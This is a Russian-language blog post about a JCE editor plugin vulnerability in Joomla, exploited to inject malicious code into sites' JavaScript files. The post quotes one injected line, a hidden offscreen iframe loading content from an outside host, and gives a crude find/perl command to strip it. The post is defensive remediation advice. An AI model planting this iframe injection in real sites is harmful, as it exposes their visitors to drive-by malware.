Уязвимость Joomla с редактором JCE

В плагине редакторе JCE версии ниже 2.0.11 была обнаружена уязвимость и имеет место быть большая череда взломов с последующим внедрением вредоносного кода в js-файлы.
Тот случай, который был виден мной, состоял из следующего кода:

document.write(‘<iframe width=»55″ height=»55″ style=»width:100px;height:100px;position:absolute;left:-100px;top:0;» src=»http://cpjutiv.wikaba.com/0ca0885.tet?11″></iframe>’);

Можно попробовать выполнить следующую команду в корне директории сайта, однако она несколько грубоватая

find ./ -type f -name «*.js» -exec perl -pi -e ‘s/docume.*\)\;//g»’ ‘{}’ \;

и как обычно рекомендую перед этим сделать резервную копию сайта.

Другие публикации по теме:

Убираем информацию о принадлежности сайта к CMS Jo... Буквально пару дней назад на сайте Алекса Куртеева был опубликован аннонс плагина, с помощью которого можно изменить или просто убрать информацию о дв...
Вышла Joomla 1.6 alpha 2 Как-то так незамеченно от меня прошла новость. Исправляюсь. В координаторском блоге Кеннет Краудер сообщил следующее: Проект Joomla спешит известить...
Добавить социальные кнопки в Kunena 1.7.x... Вспомнилось, что все хотел добавить на форум возможность делиться с друзьями ссылками на темы посредством социальных сервисов и сетей. В репозитарии р...
Плагин поиска по mediawiki 1.18.x для Joomla! 2.5... Плагин написан в замен MediaWiki Search, чья версия подходит только для использования с Joomla! 1.5.x. Автор - фрилансер с joomlaforum.ru ;)Превос...

Поделиться информацией с друзьями!

Чтобы не пропустить обновления, подпишись на RSS или почтовую рассылку (свой выбор сделали уже 128 человек!)

1 комментарий к “Уязвимость Joomla с редактором JCE

  1. Блин я в то же дерьмо вляпался.. Спасибо, сейчас хоть немного прояснилось.

Оставить комментарий